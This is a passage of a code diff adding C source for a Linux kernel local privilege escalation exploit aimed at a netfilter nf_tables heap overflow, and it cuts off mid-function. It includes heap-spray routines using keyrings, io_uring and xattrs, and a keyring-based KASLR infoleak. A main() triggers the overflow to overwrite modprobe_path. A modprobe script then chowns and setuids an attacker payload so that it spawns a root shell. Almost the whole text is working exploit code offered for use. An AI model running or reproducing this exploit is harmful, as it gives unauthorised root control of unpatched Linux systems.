+#define _NF_TABLES_H_
+
+#include <stdint.h>
+
+#define TABLEMSG_SIZE NLMSG_SPACE(sizeof(struct nfgenmsg) + sizeof(struct nlattr) + 8)
+
+#define KMALLOC64_KEYLEN (64 - 8 - 12 - 16) // Max size - elemsize - sizeof(nft_set_ext)(align) - min datasize
+
+void create_table(int sock, const char *name);
+void create_set(int sock, const char *set_name, uint32_t set_keylen, uint32_t data_len, const char *table_name, uint32_t id);
+void add_elem_to_set(int sock, const char *set_name, uint32_t set_keylen, const char *table_name, uint32_t id, uint32_t data_len, uint8_t *data);
+
+#endif /* _NF_TABLES_H_ */
@@ -0,0 +1,26 @@
+#ifndef _SIMPLE_XATTR_H_
+#define _SIMPLE_XATTR_H_
+
+#include <stdint.h>
+
+#define XATTR_FILE "/tmp/tmpfs/a"
+#define XATTR_VALUE "value"
+
+#define XATTR_DELETION_NAME "security.Iwanttoberoot"
+
+#define ATTRIBUTE_NAME_LEN 0x100
+#define COMMAND_MAX_LEN 0x100
+
+#define PREFIX_BUFFER_LEN 16
+
+struct write4_payload {
+    uint8_t prefix[PREFIX_BUFFER_LEN];
+    void *next;
+    void *prev;
+    uint8_t name_offset;
+} __attribute__((packed));
+
+void spray_simple_xattr(char *filename, uint32_t spray_size);
+void create_xattr(const char *filename, char *attribute_name);
+
+#endif /* _SIMPLE_XATTR_H_ */
@@ -0,0 +1,27 @@
+#ifndef _URING_H_
+#define _URING_H_
+
+#include <stdint.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <linux/io_uring.h>
+
+#define SPRAY_NB_ENTRIES 10
+
+struct fd_uring {
+    int fd;
+    struct io_uring_params *params;
+};
+
+static inline int io_uring_setup(uint32_t entries, struct io_uring_params *p) {
+    return syscall(__NR_io_uring_setup, entries, p);
+}
+
+static inline int io_uring_register(int fd, unsigned int opcode, void *arg, unsigned int nr_args) {
+    return syscall(__NR_io_uring_register, fd, opcode, arg, nr_args);
+}
+
+void spray_uring(uint32_t spray_size, struct fd_uring *fd_buffer);
+void release_uring(struct fd_uring *fd_buffer, uint32_t buffer_size);
+
+#endif /* _URING_H_ */
@@ -0,0 +1,27 @@
+#ifndef _UTIL_H_
+#define _UTIL_H_
+
+#include <unistd.h>
+
+#define FILENAME_MAX_LEN 0x80
+#define KERNEL_VERSION_SIZE_BUFFER 512
+#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+
+struct kernel_info {
+	const char* kernel_version;
+	uint64_t io_ring_ctx_ref_free;
+	uint64_t io_rsrc_node_ref_zero;
+	uint64_t modprobe_path;
+};
+
+extern struct kernel_info kernels[];
+extern int kernel;
+
+void new_ns(void);
+void generate_table_name(char table_name[8]);
+void set_cpu_affinity(int cpu_n, pid_t pid);
+struct utsname* get_kernel_version(void);
+int detect_versions(void);
+char *generate_tmp_filename(void);
+
+#endif /* _UTIL_H_ */
@@ -0,0 +1,125 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include <limits.h>
+#include <linux/keyctl.h>
+
+#include "log.h"
+#include "keyring.h"
+#include "util.h"
+
+/**
+ * spray_keyring(): Spray the heap with `user_key_payload` structure
+ * @spray_size: Number of object to put into the `kmalloc-64` cache
+ *
+ * Return: Allocated buffer with serial numbers of the created keys
+ */
+key_serial_t *spray_keyring(uint32_t spray_size) {
+
+    char key_desc[KEY_DESC_MAX_SIZE];
+    key_serial_t *id_buffer = calloc(spray_size, sizeof(key_serial_t));
+
+    if (id_buffer == NULL)
+        do_error_exit("calloc");
+
+    for (uint32_t i = 0; i < spray_size; i++) {
+        snprintf(key_desc, KEY_DESC_MAX_SIZE, "RandoriSec-%03du", i);
+        id_buffer[i] = add_key("user", key_desc, key_desc, strlen(key_desc), KEY_SPEC_PROCESS_KEYRING);
+        if (id_buffer[i] < 0)
+            do_error_exit("add_key");
+    }
+
+    return id_buffer;
+}
+
+/**
+ * dump_buffer(): Debug function to analyze the infoleak
+ * @buffer: Buffer that contains the infoleak
+ * @buffer_size: Size of the previous buffer
+ */
+void dump_buffer(void **buffer, uint32_t buffer_size) {
+    for (uint32_t i = 0; i < buffer_size; i++) {
+        printf("[*] %d: %p\n", i, buffer[i]);
+    }
+}
+
+/**
+ * parse_leak(): Parse the infoleak to compute the kaslr base and the physmap base
+ * @buffer: Buffer that contains the infoleak
+ * @buffer_size: Size of the previous buffer
+ *
+ * Search for a pointer to the function `io_ring_ctx_ref_free` that is stored within a `percpu_ref_data` structure
+ * Then compute the KASLR base
+ * Finally use the pointer to the associated `percpu_ref` to compute the physmap base
+ *
+ * Return: KASLR base and physmap base of the running kernel
+ */
+struct leak *parse_leak(long *buffer, uint32_t buffer_size) {
+
+    struct leak *ret = malloc(sizeof(struct leak));
+    if (!ret)
+        do_error_exit("malloc");
+
+    for (uint32_t i = 0; i < buffer_size; i++) {
+
+        /* Search for reference to the function io_ring_ctx_ref_free */
+        if ((buffer[i] & 0xfffff) == (kernels[kernel].io_ring_ctx_ref_free & 0xfffff)) {
+            ret->kaslr_base = buffer[i] - kernels[kernel].io_ring_ctx_ref_free;
+            ret->physmap_base = buffer[i + 5] & 0xffffffff00000000;
+            return ret;
+
+        /* Search for reference to the function io_rsrc_node_ref_zero */
+        } else if ((buffer[i] & 0xfffff) == (kernels[kernel].io_rsrc_node_ref_zero & 0xfffff)) {
+            ret->kaslr_base = buffer[i] - kernels[kernel].io_rsrc_node_ref_zero;
+            ret->physmap_base = buffer[i + 5] & 0xffffffff00000000;
+            return ret;
+        }
+    }
+
+    free(ret);
+    return NULL;
+}
+
+/**
+ * get_keyring_leak(): Find the infoleak and compute the needed bases
+ * @id_buffer: Buffer with the serial numbers of keys used to spray the heap
+ * @id_buffer_size: Size of the previous buffer
+ *
+ * Search for a key with an unexpected size to find the corrupted object.
+ *
+ * Return: KASLR base and physmap base of the running kernel
+ */
+struct leak *get_keyring_leak(key_serial_t *id_buffer, uint32_t id_buffer_size) {
+    
+    uint8_t buffer[USHRT_MAX] = {0};
+    int32_t keylen;
+
+    for (uint32_t i = 0; i < id_buffer_size; i++) {
+
+        keylen = keyctl(KEYCTL_READ, id_buffer[i], (long)buffer, USHRT_MAX, 0);
+        if (keylen < 0)
+            do_error_exit("keyctl");
+
+        if (keylen == USHRT_MAX) {
+            //dump_buffer((void **)buffer, keylen >> 3);
+            return parse_leak((long *)buffer, keylen >> 3);
+        }
+    }
+    return NULL;
+}
+
+/**
+ * release_keys(): Release user_key_payload objects
+ * @id_buffer: Buffer that stores the id of the key to remove
+ * @id_buffer_size: Size of the previous buffer
+ */
+void release_keys(key_serial_t *id_buffer, uint32_t id_buffer_size) {
+    
+    for (uint32_t i = 0; i < id_buffer_size; i++) {
+        if (keyctl(KEYCTL_REVOKE, id_buffer[i], 0, 0, 0) < 0)
+            do_error_exit("keyctl(KEYCTL_REVOKE)");
+    }
+
+    free(id_buffer);
+}
@@ -0,0 +1,142 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include <unistd.h>
+#include <limits.h>
+#include <sys/wait.h>
+#include <arpa/inet.h>
+#include <sys/xattr.h>
+#include <sys/socket.h>
+#include <linux/netlink.h>
+
+#include "log.h"
+#include "util.h"
+#include "uring.h"
+#include "keyring.h"
+#include "modprobe.h"
+#include "nf_tables.h"
+#include "simple_xattr.h"
+
+#define ID 1337
+#define SET_NAME "name\0\0\0"
+#define LEAK_SET_NAME "leak\0\0\0"
+#define TABLE_NAME "table\0\0"
+
+#define SPRAY_SIZE 300
+
+int main(int argc, char **argv) {
+    int sock;
+    struct sockaddr_nl snl;
+    struct write4_payload payload;
+    struct keyring_payload leak_payload;
+    struct leak *bases;
+    struct fd_uring *fd_buffer;
+    key_serial_t *id_buffer;
+    char *xattr_target_filename;
+
+    if (argc != 2)
+    {
+		printf("[-] Usage: %s <payload_path>\n", argv[0]);
+		do_error_exit("argerror");
+    }
+
+    if (detect_versions() == -1)
+    {
+		do_error_exit("kernel_offsets");
+    }
+    /* Pin the process to the first CPU */
+    set_cpu_affinity(0, 0);
+
+    prepare_root_shell(argv[1]);
+    printf("[+] Second process currently waiting\n");
+
+    new_ns();
+    printf("[+] Get CAP_NET_ADMIN capability\n");
+
+    /* Netfilter netlink socket creation */
+    if ((sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_NETFILTER)) < 0) {
+        do_error_exit("socket");
+    }
+    printf("[+] Netlink socket created\n");
+
+    // Binding
+    memset(&snl, 0, sizeof(snl));
+    snl.nl_family = AF_NETLINK;
+    snl.nl_pid = getpid();
+    if (bind(sock, (struct sockaddr *)&snl, sizeof(snl)) < 0) {
+        do_error_exit("bind");
+    }
+    printf("[+] Netlink socket bound\n");
+
+    /* Create a netfilter table */
+    create_table(sock, TABLE_NAME);
+    printf("[+] Table %s created\n", TABLE_NAME);
+
+    /* Create a netfilter set for the info leak */
+    create_set(sock, LEAK_SET_NAME, KMALLOC64_KEYLEN, sizeof(struct keyring_payload), TABLE_NAME, ID);
+    printf("[+] Set for the leak created\n");
+
+    /*  Create a netfilter set for the write primitive */
+    create_set(sock, SET_NAME, KMALLOC64_KEYLEN, sizeof(struct write4_payload), TABLE_NAME, ID + 1);
+    printf("[+] Set for write primitive created\n");
+
+    /* Prepare the payload for the leak */
+    memset(&leak_payload, 0, sizeof(struct keyring_payload));
+    leak_payload.len = USHRT_MAX;
+
+    printf("[*] Leak in process\n");
+    fflush(stdout);
+retry:
+    /* Spray the heap with user_key_payload structs to perform an info leak */ 
+    id_buffer = spray_keyring(SPRAY_KEY_SIZE);
+
+    /** Perform the overflow to modify the size of a registered key **/
+    add_elem_to_set(sock, LEAK_SET_NAME, KMALLOC64_KEYLEN, TABLE_NAME, ID, sizeof(struct keyring_payload), (uint8_t *)&leak_payload);
+
+    /* Spray the heap with percpu_ref_data */
+    fd_buffer = calloc(SPRAY_SIZE, sizeof(struct fd_uring));
+    if (!fd_buffer)
+        do_error_exit("calloc");
+    spray_uring(SPRAY_SIZE, fd_buffer);
+
+    /* Check if the overflow occured on the right object */
+    bases = get_keyring_leak(id_buffer, SPRAY_KEY_SIZE);
+    if (!bases) {
+        release_keys(id_buffer, SPRAY_KEY_SIZE);
+        release_uring(fd_buffer, SPRAY_SIZE);
+        goto retry;
+    }
+    printf("\r[+] Leak succeed     \n");
+    printf("[+] kaslr base found 0x%lx\n", bases->kaslr_base);
+    printf("[+] physmap base found 0x%lx\n", bases->physmap_base);
+
+    /* Prepare the payload for the write primitive */
+    memset(&payload, 0, sizeof(struct write4_payload));
+    payload.next = (void *)(bases->physmap_base + 0x2f706d74);
+    payload.prev = (void *)(bases->kaslr_base + kernels[kernel].modprobe_path + 1);
+    payload.name_offset = 0xe5;
+
+respray_xattr:
+    /* Spray the heap for the write primitive */
+    xattr_target_filename = generate_tmp_filename();
+    spray_simple_xattr(xattr_target_filename, SPRAY_SIZE);
+
+    add_elem_to_set(sock, SET_NAME, KMALLOC64_KEYLEN, TABLE_NAME, ID, sizeof(struct write4_payload), (uint8_t *)&payload);
+
+    /* Proceed to the write */
+    if (removexattr(xattr_target_filename, XATTR_DELETION_NAME) < 0)
+        goto respray_xattr;
+
+    printf("[+] modprobe_path changed !\n");
+
+    setup_modprobe_payload(argv[1]);
+    printf("[+] Modprobe payload setup\n");
+    get_root_shell();
+
+    printf("[+++] Got root shell, should exit?\n");
+    /* Win ! */
+
+    exit(EXIT_SUCCESS);
+}
@@ -0,0 +1,131 @@
+#include <stdio.h>
+#include <fcntl.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <sys/shm.h>
+#include <sys/ipc.h>
+#include <sys/types.h>
+#include <semaphore.h>
+#include <string.h>
+#include <sys/wait.h>
+
+#include "log.h"
+#include "modprobe.h"
+
+const char dummy_file[] = "/tmp/dummy\0";
+
+const char dummy_content[] = "\xff\xff\xff\xff";
+const char* new_modprobe_content[] = { "#!/bin/bash\n\nchown root:root ",
+	"\nchmod 4555 "
+};
+
+sem_t *shell_barrier;
+
+/**
+ * prepare_root_shell(): Setup a second process waiting out the namespaces used for the exploit
+ */
+void prepare_root_shell(char* payload) {
+
+    int shmid = shmget(0x1337, sizeof(sem_t), IPC_CREAT | S_IRWXU | S_IRWXG | S_IRWXO);
+    shell_barrier = shmat(shmid, NULL, 0);
+
+    if (sem_init(shell_barrier, 1, 0) < 0)
+        do_error_exit("sem_init");
+
+    if (!fork()) {
+        sem_wait(shell_barrier);
+
+        execl(payload, payload, NULL);
+        exit(EXIT_FAILURE);
+    }
+}
+
+/**
+ * create_dummy_file(): Create a file to trigger call_modprobe in case of execution
+ */
+void create_dummy_file(void) {
+    int fd;
+
+    fd = open(dummy_file, O_CREAT | O_RDWR, S_IRWXU | S_IRWXG | S_IRWXO);
+    write(fd, dummy_content, sizeof(dummy_content));
+    close(fd);
+}
+
+/**
+ * get_root_shell(): Trigger a call to the new modprobe_path
+ */
+void get_root_shell(void) {
+    int pid = fork();
+    if (pid == 0)
+    {
+        execl("/tmp/dummy", "/tmp/dummy", NULL);
+        exit(EXIT_FAILURE);
+    }
+    printf("[?] waitpid\n");
+    waitpid(pid, NULL, 0);
+    printf("[?] sem_post\n");
+    sem_post(shell_barrier);
+}
+
+/**
+ * get_new_modprobe_path(): Read the new modprobe_path
+ *
+ * Return: path stored within /proc/sys/kernel/modprobe
+ */
+char *get_new_modprobe_path(void) {
+
+    int fd;
+    char *modprobe_path = malloc(15);
+
+    if (!modprobe_path)
+        do_error_exit("malloc");
+
+    fd = open("/proc/sys/kernel/modprobe", O_RDONLY);
+    if (fd < 0)
+        do_error_exit("open(/proc/sys/kernel/modprobe)");
+
+    read(fd, modprobe_path, 14);
+
+    close(fd);
+
+    modprobe_path[14] = '\0';
+
+    return modprobe_path;
+}
+
+/**
+ * write_new_modprobe(): Create chown && chmod script for get_root
+ * @filename: current path to modprobe for the kernel
+ */
+void write_new_modprobe(char *filename, char* payloadpath) {
+
+    int fd;
+
+    fd = open(filename, O_CREAT | O_RDWR, S_IRWXU | S_IRWXG | S_IRWXO);
+    if (fd < 0)
+        do_error_exit("open");
+
+    for (size_t i = 0; i < sizeof(new_modprobe_content) / sizeof(new_modprobe_content[0]); i++)
+    {
+      write(fd, new_modprobe_content[i], strlen(new_modprobe_content[i]));
+      write(fd, payloadpath, strlen(payloadpath));
+    }
+    write(fd, "\n", 1);
+
+    close(fd);
+}
+
+/**
+ * setup_modprobe_payload(): Prepare all the needed stuff to get a root shell
+ */
+void setup_modprobe_payload(char* payloadpath) {
+    char *filename;
+
+    filename = get_new_modprobe_path();
+
+    write_new_modprobe(filename, payloadpath);
+    create_dummy_file();
+
+    free(filename);
+}
@@ -0,0 +1,124 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <linux/netlink.h>
+#include <linux/netfilter/nfnetlink.h>
+#include <unistd.h>
+#include <string.h>
+#include <arpa/inet.h>
+
+#include "log.h"
+#include "netlink.h"
+
+/**
+ * get_batch_begin_nlmsg(): Construct a BATCH_BEGIN message for the netfilter netlink
+ */
+struct nlmsghdr *get_batch_begin_nlmsg(void) {
+
+    struct nlmsghdr *nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(sizeof(struct nfgenmsg)));
+    struct nfgenmsg *nfgm = (struct nfgenmsg *)NLMSG_DATA(nlh);
+
+    if (!nlh)
+        do_error_exit("malloc");
+
+    memset(nlh, 0, NLMSG_SPACE(sizeof(struct nfgenmsg)));
+    nlh->nlmsg_len = NLMSG_SPACE(sizeof(struct nfgenmsg));
+    nlh->nlmsg_type = NFNL_MSG_BATCH_BEGIN;
+    nlh->nlmsg_pid = getpid();
+    nlh->nlmsg_flags = 0;
+    nlh->nlmsg_seq = 0;
+
+    /* Used to access to the netfilter tables subsystem */
+    nfgm->res_id = NFNL_SUBSYS_NFTABLES;
+
+    return nlh;
+}
+
+/**
+ * get_batch_end_nlmsg(): Construct a BATCH_END message for the netfilter netlink
+ */
+struct nlmsghdr *get_batch_end_nlmsg(void) {
+
+    struct nlmsghdr *nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(sizeof(struct nfgenmsg)));
+
+    if (!nlh)
+        do_error_exit("malloc");
+
+    memset(nlh, 0, NLMSG_SPACE(sizeof(struct nfgenmsg)));
+    nlh->nlmsg_len = NLMSG_SPACE(sizeof(struct nfgenmsg));
+    nlh->nlmsg_type = NFNL_MSG_BATCH_END;
+    nlh->nlmsg_pid = getpid();
+    nlh->nlmsg_flags = NLM_F_REQUEST;
+    nlh->nlmsg_seq = 0;
+
+    return nlh;
+}
+
+/**
+ * set_nested_attr(): Prepare a nested netlink attribute
+ * @attr: Attribute to fill
+ * @type: Type of the nested attribute
+ * @data_len: Length of the nested attribute
+ */
+struct nlattr *set_nested_attr(struct nlattr *attr, uint16_t type, uint16_t data_len) {
+    attr->nla_type = type;
+    attr->nla_len = NLA_ALIGN(data_len + sizeof(struct nlattr));
+    return (void *)attr + sizeof(struct nlattr);
+}
+
+/**
+ * set_u32_attr(): Prepare an integer netlink attribute
+ * @attr: Attribute to fill
+ * @type: Type of the attribute
+ * @value: Value of this attribute
+ */
+struct nlattr *set_u32_attr(struct nlattr *attr, uint16_t type, uint32_t value) {
+    attr->nla_type = type;
+    attr->nla_len = U32_NLA_SIZE;
+    *(uint32_t *)NLA_ATTR(attr) = htonl(value);
+
+    return (void *)attr + U32_NLA_SIZE;
+}
+
+ /**
+ * set_u64_attr(): Prepare a 64 bits integer netlink attribute
+ * @attr: Attribute to fill
+ * @type: Type of the attribute
+ * @value: Value of this attribute
+ */
+struct nlattr *set_u64_attr(struct nlattr *attr, uint16_t type, uint64_t value) {
+    attr->nla_type = type;
+    attr->nla_len = U64_NLA_SIZE;
+    *(uint64_t *)NLA_ATTR(attr) = htobe64(value);
+
+    return (void *)attr + U64_NLA_SIZE;
+}
+
+/**
+ * set_str8_attr(): Prepare a 8 bytes long string netlink attribute
+ * @attr: Attribute to fill
+ * @type: Type of the attribute
+ * @name: Buffer to copy into the attribute
+ */
+struct nlattr *set_str8_attr(struct nlattr *attr, uint16_t type, const char name[8]) {
+    attr->nla_type = type;
+    attr->nla_len = S8_NLA_SIZE;
+    memcpy(NLA_ATTR(attr), name, 8);
+
+    return (void *)attr + S8_NLA_SIZE;
+}
+
+/**
+ * set_binary_attr(): Prepare a byte array netlink attribute
+ * @attr: Attribute to fill
+ * @type: Type of the attribute
+ * @buffer: Buffer with data to send
+ * @buffer_size: Size of the previous buffer
+ */
+struct nlattr *set_binary_attr(struct nlattr *attr, uint16_t type, uint8_t *buffer, uint64_t buffer_size) {
+    attr->nla_type = type;
+    attr->nla_len = NLA_BIN_SIZE(buffer_size);
+    memcpy(NLA_ATTR(attr), buffer, buffer_size);
+
+    return (void *)attr + NLA_ALIGN(NLA_BIN_SIZE(buffer_size));
+}
@@ -0,0 +1,313 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <linux/netfilter.h>
+#include <linux/netfilter/nfnetlink.h>
+#include <linux/netfilter/nf_tables.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <linux/netlink.h>
+#include <string.h>
+
+#include "netlink.h"
+#include "nf_tables.h"
+#include "log.h"
+
+const uint8_t zerobuf[0x40] = {0};
+
+/**
+ * create_table(): Register a new table for the inet family
+ * @sock: socket bound to the netfilter netlink
+ * @name: Name of the new table
+ */
+void create_table(int sock, const char *name) {
+    struct msghdr msg;
+    struct sockaddr_nl dest_snl;
+    struct iovec iov[3];
+    struct nlmsghdr *nlh_batch_begin;
+    struct nlmsghdr *nlh;
+    struct nlmsghdr *nlh_batch_end;
+    struct nlattr *attr;
+    struct nfgenmsg *nfm;
+
+    /* Destination preparation */
+    memset(&dest_snl, 0, sizeof(dest_snl));
+    dest_snl.nl_family = AF_NETLINK;
+    memset(&msg, 0, sizeof(msg));
+
+    /* Netlink batch_begin message preparation */
+    nlh_batch_begin = get_batch_begin_nlmsg();
+
+    /* Netlink table message preparation */
+    nlh = (struct nlmsghdr *)malloc(TABLEMSG_SIZE);
+    if (!nlh)
+        do_error_exit("malloc");
+
+    memset(nlh, 0, TABLEMSG_SIZE);
+    nlh->nlmsg_len = TABLEMSG_SIZE;
+    nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWTABLE;
+    nlh->nlmsg_pid = getpid();
+    nlh->nlmsg_flags = NLM_F_REQUEST;
+    nlh->nlmsg_seq = 0;
+
+    nfm = NLMSG_DATA(nlh);
+    nfm->nfgen_family = NFPROTO_INET;
+
+    /** Prepare associated attribute **/
+    attr = (void *)nlh + NLMSG_SPACE(sizeof(struct nfgenmsg));
+    set_str8_attr(attr, NFTA_TABLE_NAME, name);
+
+    /* Netlink batch_end message preparation */
+    nlh_batch_end = get_batch_end_nlmsg();
+
+    /* IOV preparation */
+    memset(iov, 0, sizeof(struct iovec) * 3);
+    iov[0].iov_base = (void *)nlh_batch_begin;
+    iov[0].iov_len = nlh_batch_begin->nlmsg_len;
+    iov[1].iov_base = (void *)nlh;
+    iov[1].iov_len = nlh->nlmsg_len;
+    iov[2].iov_base = (void *)nlh_batch_end;
+    iov[2].iov_len = nlh_batch_end->nlmsg_len;
+
+    /* Message header preparation */
+    msg.msg_name = (void *)&dest_snl;
+    msg.msg_namelen = sizeof(struct sockaddr_nl);
+    msg.msg_iov = iov;
+    msg.msg_iovlen = 3;
+
+    sendmsg(sock, &msg, 0);
+
+    /* Free used structures */
+    free(nlh_batch_end);
+    free(nlh);
+    free(nlh_batch_begin);
+}
+
+/**
+ * create_set(): Create a netfilter set
+ * @sock: Socket used to communicate throught the netfilter netlink
+ * @set_name: Name of the created set
+ * @set_keylen: Length of the keys of this set. Used in the exploit to control the used cache
+ * @data_len: Length of stored data. Used to control the size of the overflow
+ * @table_name: Name of the table that stores this set
+ * @id: ID of the created set
+ */
+void create_set(int sock, const char *set_name, uint32_t set_keylen, uint32_t data_len, const char *table_name, uint32_t id) {
+    struct msghdr msg;
+    struct sockaddr_nl dest_snl;
+    struct nlmsghdr *nlh_batch_begin;
+    struct nlmsghdr *nlh_payload;
+    struct nlmsghdr *nlh_batch_end;
+    struct nfgenmsg *nfm;
+    struct nlattr *attr;
+    uint64_t nlh_payload_size;
+    struct iovec iov[3];
+
+    /* Prepare the netlink sockaddr for msg */
+    memset(&dest_snl, 0, sizeof(struct sockaddr_nl));
+    dest_snl.nl_family = AF_NETLINK;
+
+    /* First netlink message: batch_begin */
+    nlh_batch_begin = get_batch_begin_nlmsg();
+
+    /* Second netlink message : Set attributes */
+    nlh_payload_size = sizeof(struct nfgenmsg);                                     // Mandatory
+    nlh_payload_size += S8_NLA_SIZE;                                                // NFTA_SET_TABLE
+    nlh_payload_size += S8_NLA_SIZE;                                                // NFTA_SET_NAME
+    nlh_payload_size += U32_NLA_SIZE;                                               // NFTA_SET_ID
+    nlh_payload_size += U32_NLA_SIZE;                                               // NFTA_SET_KEY_LEN
+    nlh_payload_size += U32_NLA_SIZE;                                               // NFTA_SET_FLAGS
+    nlh_payload_size += U32_NLA_SIZE;                                               // NFTA_SET_DATA_TYPE
+    nlh_payload_size += U32_NLA_SIZE;                                               // NFTA_SET_DATA_LEN
+    nlh_payload_size = NLMSG_SPACE(nlh_payload_size);
+
+    /** Allocation **/
+    nlh_payload = (struct nlmsghdr *)malloc(nlh_payload_size);
+    if (!nlh_payload)
+        do_error_exit("malloc");
+
+    memset(nlh_payload, 0, nlh_payload_size);
+
+    /** Fill the required fields **/
+    nlh_payload->nlmsg_len = nlh_payload_size;
+    nlh_payload->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSET;
+    nlh_payload->nlmsg_pid = getpid();
+    nlh_payload->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE;
+    nlh_payload->nlmsg_seq = 0;
+
+    
+    /** Setup the nfgenmsg **/
+    nfm = (struct nfgenmsg *)NLMSG_DATA(nlh_payload);
+    nfm->nfgen_family = NFPROTO_INET;                                               // Verify if it is compulsory
+
+    /** Setup the attributes */
+    attr = (struct nlattr *)((void *)nlh_payload + NLMSG_SPACE(sizeof(struct nfgenmsg)));
+    attr = set_str8_attr(attr, NFTA_SET_TABLE, table_name);
+    attr = set_str8_attr(attr, NFTA_SET_NAME, set_name);
+    attr = set_u32_attr(attr, NFTA_SET_ID, id);
+    attr = set_u32_attr(attr, NFTA_SET_KEY_LEN, set_keylen);
+    attr = set_u32_attr(attr, NFTA_SET_FLAGS, NFT_SET_MAP);
+    attr = set_u32_attr(attr, NFTA_SET_DATA_TYPE, 0);
+    set_u32_attr(attr, NFTA_SET_DATA_LEN, data_len);
+
+    /* Last netlink message: batch_end */
+    nlh_batch_end = get_batch_end_nlmsg();
+
+    /* Setup the iovec */
+    memset(iov, 0, sizeof(struct iovec) * 3);
+    iov[0].iov_base = (void *)nlh_batch_begin;
+    iov[0].iov_len = nlh_batch_begin->nlmsg_len;
+    iov[1].iov_base = (void *)nlh_payload;
+    iov[1].iov_len = nlh_payload->nlmsg_len;
+    iov[2].iov_base = (void *)nlh_batch_end;
+    iov[2].iov_len = nlh_batch_end->nlmsg_len;
+
+    /* Prepare the message to send */
+    memset(&msg, 0, sizeof(struct msghdr));
+    msg.msg_name = (void *)&dest_snl;
+    msg.msg_namelen = sizeof(struct sockaddr_nl);
+    msg.msg_iov = iov;
+    msg.msg_iovlen = 3;
+
+    /* Send message */
+    sendmsg(sock, &msg, 0);
+
+    /* Free allocated memory */
+    free(nlh_batch_end);
+    free(nlh_payload);
+    free(nlh_batch_begin);
+}
+
+/**
+ * add_elem_to_set(): Trigger the heap buffer overflow
+ * @sock: Socket used to communicate throught the netfilter netlink
+ * @set_name: Name of the set to add the element
+ * @set_keylen: Length of the keys of the previous set
+ * @table_name: Table associated to the preiv
+ * @id: ID of the previous set
+ * @data_len: Length of the data to copy. (= Size of the overflow - 16 )
+ * @data: Data used for the overflow
+ *
+ * Submit two elements to add to the set.
+ * The first one is used to setup the data payload
+ * The second will trigger the overflow
+ */
+void add_elem_to_set(int sock, const char *set_name, uint32_t set_keylen, const char *table_name, uint32_t id, uint32_t data_len, uint8_t *data) {
+    struct msghdr msg;
+    struct sockaddr_nl dest_snl;
+    struct nlmsghdr *nlh_batch_begin;
+    struct nlmsghdr *nlh_payload;
+    struct nlmsghdr *nlh_batch_end;
+    struct nfgenmsg *nfm;
+    struct nlattr *attr;
+    uint64_t nlh_payload_size;
+    uint64_t nested_attr_size;
+    size_t first_element_size;
+    size_t second_element_size;
+    struct iovec iov[3];
+
+    /* Prepare the netlink sockaddr for msg */
+    memset(&dest_snl, 0, sizeof(struct sockaddr_nl));
+    dest_snl.nl_family = AF_NETLINK;
+
+    /* First netlink message: batch */
+    nlh_batch_begin = get_batch_begin_nlmsg();
+
+    /* Second netlink message : Set attributes */
+
+    /** Precompute the size of the nested field **/
+    nested_attr_size = 0;
+
+    /*** First element ***/
+    nested_attr_size += sizeof(struct nlattr);                                      // Englobing attribute
+    nested_attr_size += sizeof(struct nlattr);                                      // NFTA_SET_ELEM_KEY
+    nested_attr_size += NLA_BIN_SIZE(set_keylen);                                   // NFTA_DATA_VALUE
+    nested_attr_size += sizeof(struct nlattr);                                      // NFTA_SET_ELEM_DATA
+    nested_attr_size += NLA_ALIGN(NLA_BIN_SIZE(data_len));                          // NFTA_DATA_VALUE
+    first_element_size = nested_attr_size;
+
+    /*** Second element ***/
+    nested_attr_size += sizeof(struct nlattr);                                      // Englobing attribute
+    nested_attr_size += sizeof(struct nlattr);                                      // NFTA_SET_ELEM_KEY
+    nested_attr_size += NLA_BIN_SIZE(set_keylen);                                   // NFTA_DATA_VALUE
+    nested_attr_size += sizeof(struct nlattr);                                      // NFTA_SET_ELEM_DATA
+    nested_attr_size += sizeof(struct nlattr);                                      // NFTA_DATA_VERDICT
+    nested_attr_size += U32_NLA_SIZE;                                               // NFTA_VERDICT_CODE
+    second_element_size = nested_attr_size - first_element_size;
+
+    nlh_payload_size = sizeof(struct nfgenmsg);                                     // Mandatory
+    nlh_payload_size += sizeof(struct nlattr);                                      // NFTA_SET_ELEM_LIST_ELEMENTS
+    nlh_payload_size += nested_attr_size;                                           // All the stuff described above
+    nlh_payload_size += S8_NLA_SIZE;                                                // NFTA_SET_ELEM_LIST_TABLE
+    nlh_payload_size += S8_NLA_SIZE;                                                // NFTA_SET_ELEM_LIST_SET
+    nlh_payload_size += U32_NLA_SIZE;                                               // NFTA_SET_ELEM_LIST_SET_ID
+    nlh_payload_size = NLMSG_SPACE(nlh_payload_size);
+
+    /** Allocation **/
+    nlh_payload = (struct nlmsghdr *)malloc(nlh_payload_size);
+    if (!nlh_payload) {
+        do_error_exit("malloc");
+    }
+    memset(nlh_payload, 0, nlh_payload_size);
+
+    /** Fill the required fields **/
+    nlh_payload->nlmsg_len = nlh_payload_size;
+    nlh_payload->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSETELEM;
+    nlh_payload->nlmsg_pid = getpid();
+    nlh_payload->nlmsg_flags = NLM_F_REQUEST;
+    nlh_payload->nlmsg_seq = 0;
+
+    /** Setup the nfgenmsg **/
+    nfm = (struct nfgenmsg *)NLMSG_DATA(nlh_payload);
+    nfm->nfgen_family = NFPROTO_INET;
+
+    /** Setup the attributes */
+    attr = (struct nlattr *)((void *)nlh_payload + NLMSG_SPACE(sizeof(struct nfgenmsg)));
+    attr = set_str8_attr(attr, NFTA_SET_ELEM_LIST_TABLE, table_name);
+    attr = set_str8_attr(attr, NFTA_SET_ELEM_LIST_SET, set_name);
+    attr = set_u32_attr(attr, NFTA_SET_ELEM_LIST_SET_ID, id);
